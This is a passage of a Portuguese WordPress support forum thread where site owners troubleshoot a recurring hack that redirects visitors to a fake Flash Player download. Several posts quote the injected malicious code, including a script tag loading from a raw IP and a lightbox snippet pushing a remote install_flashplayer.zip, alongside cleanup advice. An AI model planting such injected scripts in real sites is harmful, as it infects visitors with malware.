• Resolvido AMORROBSTEN

    (@amorrobsten)


    Olá, estou com um problema, quando acesso a página inicial do site, ela é direcionada para uma página que pede a instalação do /flashplayer/download , com link, pode ser virus ,ou algum problema com o diretório?

Visualizando 15 respostas - 16 até 30 (de um total de 38)
  • AMORROBSTEN,

    Correto, muito obrigado pela colaboração.

    Criador do tópico AMORROBSTEN

    (@amorrobsten)

    Por nada, eu que agradeço, e espero que tenha ajudado também.
    Outra coisa,
    PARA QUE FIQUE CLARO: NUNCA ACEITE ESSE APLICATIVO PEDINDO PRA INSTALAR ESSE PLUING, ACREDITO QUE SEJA POR ELE QUE O VIRUS SE INSTALA NO COMPUTADOR.

    verdade, faz sentido. não é o plugin oficial
    da adobe com certeza.

    O que eu fiz foi apagar todos os registros “<script…” dos títulos dos meus posts, direto via phpmyadmin. Em seguida baixei plugins de segurança, em especial um que permite alterar o prefixo das tabelas de banco de dados “wp_” para outro qualquer.

    Depois disso tudo, passei antivírus no meu PC assim como o AMORROBSTEN fez.

    Aparentemente resolveu.

    Pessoal, tenho o mesmo problema há vários meses.
    Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…

    Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script&gt;

    O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.

    O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.

    Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
    Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novo

    Percebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.

    Meu site também gerou esse vírus… mas a linha de código não estava nos títulos, então fiz uma pesquisa geral em todas tabelas pelo PHPMYADMIN e ela estava na coluna WP-OPTIONS.

    Mas, aparentemente ta funcionando.

    Fiz a limpeza e varredura. Agora tá ok!

    Valew pela dica!

    O problema voltou… o jeito foi trocar de hospedagem, instalar novo wp, exportar banco de dados e fim.

    HalaneGonzaga, não adianta fazer isso. Já passei por três hospedagens, em cada uma eu comecei do zero e o problema sempre aparece.

    Estou nessa desde o começo de 2013, está muito complicado! Todo dia eu tento novos métodos, mas até agora se eu deixo o site duas horas, quando eu volto ele já está com o código inserido.

    Minha esperança é uma atualização do WordPress!

    Galera, hoje pela madrugada aconteceu comigo. O código que apareceu foi bem diferente, esse: `<script type=”text/javascript”>
    $(document).ready(function() {
    uLightBox.init({
    override:false,
    background: ‘black’,
    centerOnResize: true,
    fade: true
    });
    {
    uLightBox.alert({
    width: ‘585px’,
    title: ‘Para Continuar Atualize o Adobe@ Flash Player’,
    rightButtons: [‘Instalar’],
    opened: function() {
    $(‘<span />’).html(“<a style=’border:0;’ onClick=’uLightBox.clear();’ href=’http://juslog.com.br/Plugins/popup/install_flashplayer.zip&#8217; target=’_blank’><img src=’./popup/flash-player.png’></a>”).appendTo(‘#lbContent’);
    },
    onClick: function(button) {
    uLightBox.clear();
    location = “http://juslog.com.br/Plugins/popup/install_flashplayer.zip&#8221;;
    }
    });

    }
    });
    </script>`

    Mas além desse código, apareceu uma pasta chamada POPUP no FTP. E quando eu tentava excluí-la, dava erro tanto no FTP, quanto no gerenciador de arquivos da minha hospedagem. Vejam se vocês não estão com essa pasta também, porque nela está o código malicioso.

    Se você foi atacado, você pode antes de tudo trocar os <?php the_title(); ?> do tema por <?php echo strip_tags(get_the_title()); ?>. Isso vai fazer com que códigos HTML inseridos nos títulos de posts não cheguem até o usuário final. É uma medida paliativa, mas vai segurar um pouco enquanto você faz um checklist de segurança e limpa o seu WordPress, ok?

    Esse tipo de vulnerabilidade acontece principalmente por conta do prefixo da tabela do WordPress, que a maioria dos sites usa a padrão “wp_” e por plugins que possuem falha de segurança. O mais importante é atualizar o sistema (wordpress, theme e plugins), trocar o prefixo da tabela de “wp_” para outro e seguir os procedimentos de segurança de alguns plugins como o Better Wp Security ou Wp Security Scan.

    Será necessário remover o código direto no banco, depois de efetuar esses procedimentos, você precisa procurar pelo código nos posts e widgets e remover manualmente um a um ou usando uma busca com sql, como alguns já comentaram por aqui.

    Se precisar de um trabalho mais avançado de limpeza ou segurança para WP, entre em contato comigo pelo richard [@] homemmaquina.com.br.

    Abração e espero que seja útil.

    Realmente lucascms… agora, eu reinstalei o wp, atualizei todos plugins…. verifiquei se tinha esse código no banco de dados. Ele já ta a umas semanas sem problema.

    HalaneGonzaga

    (@halanegonzaga)

    E hoje voltou de novo. kkkkkkkk ohhh Judiação

    alisson_jdb

    (@alisson_jdb)

    Pessoal, estou com o mesmo problema a meses já tinha largado os bets mas com a dica do richardbarros pelo menos não afeta os usuários do site.
    Tentei renomear o prefixo da tabela e não adiantou.
    Mas hoje descobri uma coisa, entrei no log do post que sempre é alterado o titulo com o script maldito que da o redirect, e a modificação sempre é feita por um usuário secundário que eu criei, que nem é utilizado.
    Removi esse usuário, e estou rezando para que seja sanado esse problema.
    HalaneGonzaga veja no log do seu post qual usuário que está modificando o post, por favor, pra ver se é um usuário secundário.
    Obrigado galera

    HalaneGonzaga

    (@halanegonzaga)

    Onde eu vejo esse log? rs… não entendi.

    alisson_jdb

    (@alisson_jdb)

    Então Helane,
    Não sei como chegar ao log,
    Aconteceu que bem na hora que eu fui editar um post o ‘virus’ ou sei lá o que tinha modificado meu post.
    Aí apareceu que eu tava editando uma versão antiga e pediu pra comprar, e mostrou todas as alterações realizadas nesse post.
    Vou tentar descobrir e te aviso.
    Seus wordpress só tem o usuário principal? normalmente chamado de admin, ou tem mais algum?

Visualizando 15 respostas - 16 até 30 (de um total de 38)
  • O tópico ‘Home direcionada para uma página do /flashplayer/download’ está fechado para novas respostas.